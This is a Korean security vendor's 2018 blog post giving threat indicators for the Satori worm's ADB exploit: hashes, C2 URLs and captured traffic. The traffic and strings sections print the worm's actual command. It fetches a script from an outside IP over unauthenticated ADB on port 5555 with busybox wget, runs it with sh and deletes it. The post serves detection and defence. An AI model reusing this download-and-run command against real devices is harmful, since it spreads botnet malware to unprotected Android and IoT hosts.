Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
악성코드 정보[Malware Info] Linux/Worm.Satori (ADB Exploit) - 1
작성일 2018-07-24 조회 803

 

 

ㅁ Malware IoC

 

  Pattern    Linux/Worm.Satori.Command
  Filename    -
  Type    ELF
  Size    48,688 bytes
  MD5    d10c1591aee800a5f37f654f1ecd20a8

 

 

 

 

 

ㅁ Malware Traffic

 

CNXN............2.......host::.OPENX............J......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://96.215.62.169/adbs -O -> adbs; sh adbs;

 * Port 5555 Request
 

 

 

 

ㅁ Malware String

 

 - ASCII : /dev/shm/ 
 - ASCII : /dev/netslink/
 - ASCII : /usr/
 - ASCII : /boot/
 - ASCII : /mnt/
 - ASCII : /dev/
 - ASCII : /var/run/

 - ASCII : /tmp/
 - ASCII : /var/                                                                                                                                

 - ASCII : /home/
 - ASCII : WWau14TJ8IapVXrrlFq0q5sxB                                                                                                
 - ASCII : pdlbwairmoheqc18k5fgstv4jn072u63/proc/stat                                                                          
 - ASCII : /proc/cpuinfo                                                                                                                    
 - ASCII : processor
 - ASCII : /sys/devices/system/cpu                                                                                                     
 - ASCII : /dev/null                                                                                                                          
 - ASCII : CNXN                                                                                                                              
 - ASCII : host::                                                                                                                              
 - ASCII : shell:>/sdcard/Download/f && cd /sdcard/Download/; 
 - ASCII :>/dev/f && cd /dev/; busybox wget hxxp://95.215.62.169/adbs -O -> adbs; sh adbs; rm adbs

 

 

 

 

ㅁ Malware C2

 

hxxp://95[.]215[.]62[.]169/i686[.]bot[.]le
hxxp://95[.]215[.]62[.]169/arm[.]bot[.]le
hxxp://95[.]215[.]62[.]169/arm7[.]bot[.]le
hxxp://95[.]215[.]62[.]169/x86_64[.]bot[.]le
hxxp://95[.]215[.]62[.]169/mips[.]bot[.]be
hxxp://95[.]215[.]62[.]169/mipsel[.]bot[.]le
hxxp://95[.]215[.]62[.]169/i586[.]bot[.]le   

 

 

 

 

ㅁ Malware Hash

 

1eddee13762d7996c02b4c57fa3f8ffc
d01f194c374eebb9235291e34bc0d185
d10c1591aee800a5f37f654f1ecd20a8
4e4fc7e7599e5bd07e097a2f313486fe
a18b0d1401305588107e58054e6aa2ab
9689cc9fe613b735fa1d386dffcdd6d8
61f0bad58d28e73d1ef29b9574d28e41

 

 

 

 

ㅁ Wins Sniper Pattern

 

 - Linux/Trojan.Satori.Command

 

 

 

 

 

Source

https://telekomsecurity.github.io/2018/07/adb-botnet.html

첨부파일 첨부파일이 없습니다.
태그 Satori  Mirai  ADB